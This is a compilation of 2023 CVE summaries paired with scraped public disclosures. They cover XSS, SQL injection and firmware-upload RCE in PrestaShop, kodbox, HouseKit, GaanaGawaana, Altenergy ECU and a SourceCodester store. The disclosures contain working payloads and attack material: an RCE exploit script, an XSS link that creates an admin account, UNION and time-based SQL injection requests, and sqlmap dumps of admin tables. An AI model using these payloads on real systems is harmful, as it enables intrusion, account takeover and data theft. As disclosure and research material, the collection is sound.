A cross-site scripting (XSS) vulnerability in PrestaShop v1.7.7.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the message parameter in /contactform/contactform.php.

**PRESTA-SHOP 1.7.7.4 REFLECTED CROSS SITE SCRIPTING**

Vulnerable Parameter: message

XSS Payload : %3cimg+src+onerror%3dprompt%288%29%3e

<Vendor> : https://www.prestashop.com/

**Vulnerable Code Part**

Default File Path

> /modules/contactform/contactform.php 

> Note: Some parameters have been changed by the company using the application.

**Description**

The PrestaShop web application lead the message value without any sanitization on contact-form .The attacker could be inject xss payload with changes the HTTP 'post' request to Http 'get' request for exploitation. That Exploitation shown belows.

**Http Request-Response**

CVE-2023-31508: Research/ReflectedXSS_1.7.7.4.md at main · mustgundogdu/Research

Altenergy Power Control Software C1.2.5 was discovered to contain a remote code execution (RCE) vulnerability via the component /models/management_model.php.

**title : insufficient verification of firmware integrity "Altenergy Power Control Software" led to RCE****SW ver: C1.2.5****Vendor: https://apsystems.com/****Google Dork: intitle:"Altenergy Power Control Software"****Affected device: ENERGY COMMUNICATION UNIT**

**POC Video :**

**vulnerable code :**

"/home/local\_web/pagesapplication/models/management\_model.php"

 public function exec\_upgrade\_ecu()
    {
        $results = array();
        $res\_array = array();

        exec("rm -rf /tmp/update\_localweb/");
        if ($\_FILES\["file"\]\["error"\] > 0)
        {
            array\_push($res\_array, "Return Code: " . $\_FILES\["file"\]\["error"\] . "<br />");
            $results\["value"\] = 1;
        }
        else
        {
            array\_push($res\_array, "Upload: " . $\_FILES\["file"\]\["name"\] . "<br />");
            array\_push($res\_array, "Type: " . $\_FILES\["file"\]\["type"\] . "<br />");
            array\_push($res\_array, "Size: " . ($\_FILES\["file"\]\["size"\] / 1024) . " Kb<br />");
            array\_push($res\_array, "Temp file: " . $\_FILES\["file"\]\["tmp\_name"\] . "<br />");        

            move\_uploaded\_file($\_FILES\["file"\]\["tmp\_name"\], "/tmp/" . $\_FILES\["file"\]\["name"\]);
            array\_push($res\_array, "Stored in: " . "/tmp/" . $\_FILES\["file"\]\["name"\]);
            exec("tar xjvf /tmp/".$\_FILES\["file"\]\["name"\]." -C /tmp");
            exec("ls /tmp/update\_localweb/assist", $temp, $value);
            exec("/tmp/update\_localweb/assist &");
            $results\["value"\] = $value ? 1 : 0;
        }

        $results\["result"\] = implode("\\n",$res\_array);
        return $results;
    }

**Exploit :**

exploit.sh

#!/bin/bash
mkdir update\_localweb 2>/dev/null
payload='ping -c 1 ahvmb8ham4hkik6ifzt7o8puyl4hs6.burpcollaborator.net'
echo $payload \> update\_localweb/assist
chmod 777 update\_localweb/assist
tar cjvf b4db0t.bin update\_localweb/
rm -rf update\_localweb 

Browse to http://<IP\_ADDR>/index.php/management/upgrade\_ecu and upload b4db0t.bin POC :

CVE-2023-31502: Disclosures/Insufficient_Verification_of_Data_Authenticity.MD at main · ahmedalroky/Disclosures

kodbox <= 1.37 is vulnerable to Cross Site Scripting (XSS) via the debug information.

English version

**0x01 Vulnerability Description**

Reflective xss vulnerability caused by debug information

**0x02 Affected version**

kodbox<=V1.39

**0x03 Vulnerability recurrence**

Triggering conditions

*   Turn off csrf protection
*   Administrator privileges

Turn off csrf protection steps

Desktop->System settings->Basic->Security->Enable csrf protection (OFF)

Then construct the link to trigger xss

    http://target.com/?API_ROUTE=admin%2Fshare%2Fget&type=<embed%20src%3d"data%3atext%2fhtml%3bbase64%2c%20PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4%3d">
    

Here construct a poc to add an administrator, because csrf is closed, here directly send a get request to add an administrator through the img tag, the added account is testu and the password is testuser

       <img src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B%221%22%3A%221%22%7D%26sizeMax=0%26sizeUse=0" style='display:none'>
    

full link, visit

    http://target.com/?API_ROUTE=admin/share/get&type=<img%20src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B"1"%3A"1"%7D%26sizeMax=0%26sizeUse=0"%20style=%27display:none%27>
    

Successfully created an admin user

*   **本文作者：**Juneha
*   **本文链接：**https://blog.mo60.cn/index.php/archives/kodbox-xss.html
*   **版权声明：**本博客所有文章除特别声明外，均默认采用 **CC BY-NC-SA 4.0** 许可协议。
*   **文章声明：**文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任，本人坚决反对利用文章内容进行恶意攻击行为，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全。

如果觉得我的文章对你有用，请随意赞赏,可备注留下ID方便感谢

CVE-2023-29791: kodbox xss - JunBlog

The Customer Management Framework (CMF) for Pimcore adds functionality for customer data management. In `pimcore/customer-management-framework-bundle` prior to version 3.3.9, business logic errors are possible in the `Conditions` tab since the counter can be a negative number. This vulnerability is capable of the unlogic in the counter value in the Conditions tab. Users should update to version 3.3.9 to receive a patch or, as a workaround, or apply the patch manually.

Skip to content

Sign up

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Case Studies
    
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   In this repository All GitHub
    

*   No suggested jump to results

*   In this repository All GitHub
    
*   In this organization All GitHub
    
*   In this repository All GitHub
    

Sign in

Sign up

pimcore / **customer-data-framework** Public

*   Notifications
*   Fork 81
*   Star 76
    

*   Code
*   Issues 16
*   Pull requests 3
*   Actions
*   Security
*   Insights

More

1.  Releases
2.  v3.3.9

Latest

Latest

Compare

Choose a tag to compare

 dvesh3 released this

10 May 13:55

v3.3.9

e8424fd

This commit was created on GitHub.com and signed with GitHub’s **verified signature**.

GPG key ID: 4AEE18F83AFDEB23

Learn about vigilant mode.

**What's Changed**

*   \[Security\] Embeding untrusted input inside CSV files leads to Formula Injection/CSV Injection by @mcop1 in #453
*   \[Security\] Restrict negative value by @aryaantony92 in #466
*   Fix phpdocs for DefaultMariaDbActivityList $activities property by @dvesh3 in #468

**Full Changelog**: v3.3.8...v3.3.9

**Contributors**

*   
*   
*   

dvesh3, mcop1, and aryaantony92

Assets 2

CVE-2023-32075: Release 3.3.9 · pimcore/customer-data-framework

HouseKit version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : codesler.com                                                               ││  Vendor   : Codesler - Rohit Chouhan (codester.com)                                    ││  Software : HouseKit 1.0 - Rent Property Booking PHP Script                            ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /flat_details.phpGET parameter 'id' is vulnerable to RXSShttps://website/flat_details.php?id=22&id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3EPath: /flats.phpGET parameter 's' is vulnerable to RXSShttps://website/flats.php?tab=on&s=Hyderabadi3phy%3cscript%3ealert(1)%3c%2fscript%3ezx0nx[-] Done

HouseKit 1.0 Cross Site Scripting

HouseKit version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : codesler.com                                                               ││  Vendor   : Codesler - Rohit Chouhan (codester.com)                                    ││  Software : HouseKit 1.0 - Rent Property Booking PHP Script                            ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /flat_details.phpGET parameter 'id' is vulnerable to SQL Injectionhttps://website/flat_details.php?id=[SQLI]---Parameter: id (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=22 AND (SELECT 2116 FROM (SELECT(SLEEP(5)))vxMc)    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: id=-4049 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b706271,0x4175424a73725a4b6b757359756765517a78784a6b50706b464f474978545652546a4a496c505841,0x716b6a6271),NULL,NULL,NULL-- ----Path: /flats.phpGET parameter 's' is vulnerable to SQL Injectionhttps://website/flats.php?tab=on&s=[SQLI]---Parameter: s (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: tab=on&s=Hyderabad' AND (SELECT 5046 FROM (SELECT(SLEEP(5)))BKYF) AND 'ReOi'='ReOi    Type: UNION query    Title: Generic UNION query (NULL) - 8 columns    Payload: tab=on&s=Hyderabad' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170706a71,0x6e536b46764c48414b6663545a4f78576a56794c74766e5351494f624c786261797255684d5a6d6d,0x716a767071),NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: '**40*26_housekit'fetching tables+--------------+| admin        || flats        || kyc          || owner        || review       || settings     || transactions || users        || wallet       || withdraw     |+--------------+fetching columns for table 'admin'+----------+---------+| Column   | Type    |+----------+---------+| id       | int(11) || password | text    || username | text    |+----------+---------+[-] Done

HouseKit 1.0 SQL Injection

GaanaGawaana version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : codesler.com                                                               ││  Vendor   : Codesler - Rohit Chouhan (codester.com)                                    ││  Software : GaanaGawaana 1.0 - Music Platform PHP Script                               ││  Vuln Type: SQL Injection                                                              ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│ Release Notes:                                                                         ││ ═════════════                                                                          ││                                                                                        ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and     ││ damage to a company's reputation.                                                      ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchhttps://website/search?q=[SQLI]GET parameter 'q' is vulnerable to SQL Injection---Parameter: q (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: q=' AND (SELECT 3838 FROM (SELECT(SLEEP(5)))giXs) AND 'YaMa'='YaMa    Type: UNION query    Title: Generic UNION query (NULL) - 12 columns    Payload: q=' UNION ALL SELECT NULL,CONCAT(0x716b707671,0x436e596a66675a65667a6c6a574e675142484f46776b4265766847466958456f6f556c4d58465172,0x716a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: '***01*6_gaanagawaana'fetching tables+----------+| settings || songs    |+----------+fetching columns for table 'settings'+-----------+--------------+| Column    | Type         |+-----------+--------------+| api_key   | varchar(200) || email     | varchar(50)  || id        | int(11)      || password  | varchar(200) || site_name | longtext     || thumbnail | longtext     || username  | varchar(200) |+-----------+--------------+[-] Done

GaanaGawaana 1.0 SQL Injection

A vulnerability has been found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This vulnerability affects unknown code of the file view_categories.php. The manipulation of the argument c leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-228802 is the identifier assigned to this vulnerability.

CVE-2023-2660

A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. This issue affects some unknown processing of the file /classes/Master.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-228803.

**Exploit Title: Online Computer and Laptop Store - Multiple vulnerabilities****Date: 2023-05/11****Exploit Author: xiahao@webray.com.cn****Vendor Homepage: https://www.sourcecodester.com****Software Link: https://www.sourcecodester.com/download-code?nid=16397&title=Online+Computer+and+Laptop+Store+using+PHP+and+MySQL+Source+Code+Free+Download****Version: 1.0****Tested on: macOs 13.3.1 (a) + phpstudy****1.Xss vulnerability in products.php****Sample request POC #1**

    http://10.211.55.3:8001/?p=products&search=%3Cscript%3Ealert(1)%3C/script%3E
    

**Browser Access Results**

**Related Codes /products.php**

    ...
    <div class="<?php echo isset($_GET['c'])? 'col-md-9': 'col-lg-10 offset-md-1' ?>">
                <div class="container-fluid p-0">
                    <?php if(isset($_GET['search'])): ?>
                        <h4 class="text-center py-5"><b>Search Results for '<?php echo $_GET['search'] ?>'</b></h4>
                    <?php endif; ?>
                <div class="row gx-2 gx-lg-2 row-cols-1 row-cols-md-3 row-cols-xl-4">
    ...
    

**2.SQL injection vulnerability in products.php****Sample request POC #2**

    GET /?p=products&c=%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x717a626271,0x6b5378665945517142636658635356665470564a4a7475446563554a4e52454a6173464a426f4451,0x717a6b6a71),NULL,NULL,NULL--%20-&s= HTTP/1.1
    Host: 10.211.55.3:8001
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    

**Sqlmap running results**

**Related Codes /products.php**

    <?php 
    $title = "";
    $sub_title = "";
    if(isset($_GET['c']) && isset($_GET['s'])){
        $cat_qry = $conn->query("SELECT * FROM categories where md5(id) = '{$_GET['c']}'");
        if($cat_qry->num_rows > 0){
            $result =$cat_qry->fetch_assoc();
            $title = $result['category'];
            $cat_description = $result['description'];
        }
     $sub_cat_qry = $conn->query("SELECT * FROM sub_categories where md5(id) = '{$_GET['s']}'");
        if($sub_cat_qry->num_rows > 0){
            $result =$sub_cat_qry->fetch_assoc();
            $sub_title = $result['sub_category'];
            $sub_cat_description = $result['description'];
        }
    }
    elseif(isset($_GET['c'])){
        $cat_qry = $conn->query("SELECT * FROM categories where md5(id) = '{$_GET['c']}'");
        if($cat_qry->num_rows > 0){
            $result =$cat_qry->fetch_assoc();
            $title = $result['category'];
            $cat_description = $result['description'];
        }
    }
    elseif(isset($_GET['s'])){
        $sub_cat_qry = $conn->query("SELECT * FROM sub_categories where md5(id) = '{$_GET['s']}'");
        if($sub_cat_qry->num_rows > 0){
            $result =$sub_cat_qry->fetch_assoc();
            $sub_title = $result['sub_category'];
            $sub_cat_description = $result['description'];
        }
    }
    ?>
    

**3.SQL injection vulnerability in view\_product.php****Sample request POC #3**

    GET /?p=view_product&id=' UNION ALL SELECT 49,49,49,49,49,49,49,49,CONCAT(0x7162627a71,0x4b7a41414f754952634f73526d53446571737665437179644c4f5253534255656463747063445a59,0x7176786b71)-- - HTTP/1.1
    Host: 10.211.55.3:8001
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    

**Sqlmap running results**

**Related Codes /view\_product.php**

    <?php 
     $products = $conn->query("SELECT p.*,b.name as bname FROM `products` p inner join brands b on p.brand_id = b.id where md5(p.id) = '{$_GET['id']}' ");
     if($products->num_rows > 0){
         foreach($products->fetch_assoc() as $k => $v){
             $$k= stripslashes($v);
         }
         $specs_qry = $conn->query("SELECT `meta_field`, `meta_value` FROM `specification_list`  where `product_id` = '{$id}'");
         $specs = array_column($specs_qry->fetch_all(MYSQLI_ASSOC), 'meta_value', 'meta_field');
        $upload_path = base_app.'/uploads/product_'.$id;
        $img = "";
        if(is_dir($upload_path)){
            $fileO = scandir($upload_path);
            if(isset($fileO[2]))
                $img = "uploads/product_".$id."/".$fileO[2];
            // var_dump($fileO);
        }
        $inventory = $conn->query("SELECT * FROM inventory where product_id = ".$id);
        $inv = array();
        while($ir = $inventory->fetch_assoc()){
            $inv[] = $ir;
        }
        $sold = $conn->query("SELECT SUM(ol.quantity) as sold FROM order_list ol inner join orders o on o.id = ol.order_id where ol.product_id='{$id}' and o.`status` != 4 ");
        $sold = $sold->num_rows > 0 ? $sold->fetch_assoc()['sold'] : 0;
     }
    ?>
    

**4.SQL injection vulnerability in view\_categories.php****Sample request POC #4**

    GET /?p=view_categories&c=' UNION ALL SELECT NULL,CONCAT(0x7162706b71,0x69424d474c4c6357514a6d7a5559647757794d756677554f7146785467646b666b466249504c776f,0x717a767871),NULL,NULL,NULL-- -&s= HTTP/1.1
    Host: 10.211.55.3:8001
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    

**Sqlmap running results**

**Related Codes /view\_categories.php**

    <?php 
    $title = "All Product Categories";
    $sub_title = "";
    if(isset($_GET['c']) && isset($_GET['s'])){
        $cat_qry = $conn->query("SELECT * FROM categories where md5(id) = '{$_GET['c']}'");
        if($cat_qry->num_rows > 0){
            $title = $cat_qry->fetch_assoc()['category'];
        }
     $sub_cat_qry = $conn->query("SELECT * FROM sub_categories where md5(id) = '{$_GET['s']}'");
        if($sub_cat_qry->num_rows > 0){
            $sub_title = $sub_cat_qry->fetch_assoc()['sub_category'];
        }
    }
    elseif(isset($_GET['c'])){
        $cat_qry = $conn->query("SELECT * FROM categories where md5(id) = '{$_GET['c']}'");
        if($cat_qry->num_rows > 0){
            $title = $cat_qry->fetch_assoc()['category'];
        }
    }
    elseif(isset($_GET['s'])){
        $sub_cat_qry = $conn->query("SELECT * FROM sub_categories where md5(id) = '{$_GET['s']}'");
        if($sub_cat_qry->num_rows > 0){
            $title = $sub_cat_qry->fetch_assoc()['sub_category'];
        }
    }
    ?>
    

**5.SQL injection vulnerability in ./classes/Master.php****Sample request POC #5**

    POST /classes/Master.php?f=delete_category HTTP/1.1
    Host: 10.211.55.3:8001
    Cache-Control: no-cache
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 114
    
    id=' AND GTID_SUBSET(CONCAT(0x717a6a7071,(SELECT (ELT(3659=3659,1))),0x71707a7071),3659)-- Hjjr
    
    

**Sqlmap running results**

**Related Codes ./classes/Master.php**

    ...
    	function delete_category(){
    		extract($_POST);
    		$del = $this->conn->query("DELETE FROM `categories` where id = '{$id}'");
    		if($del){
    			$resp['status'] = 'success';
    			$this->settings->set_flashdata('success',"Category successfully deleted.");
    		}else{
    			$resp['status'] = 'failed';
    			$resp['error'] = $this->conn->error;
    		}
    		return json_encode($resp);
    
    	}
    ...

CVE-2023-2661: CVEproject/Online-Computer-and-Laptop-Store---Multiple-vulnerabilities.md at main · xiahao90/CVEproject

A vulnerability, which was classified as critical, was found in SourceCodester Online Computer and Laptop Store 1.0. This affects an unknown part of the file view_product.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228801 was assigned to this vulnerability.

Tag

#php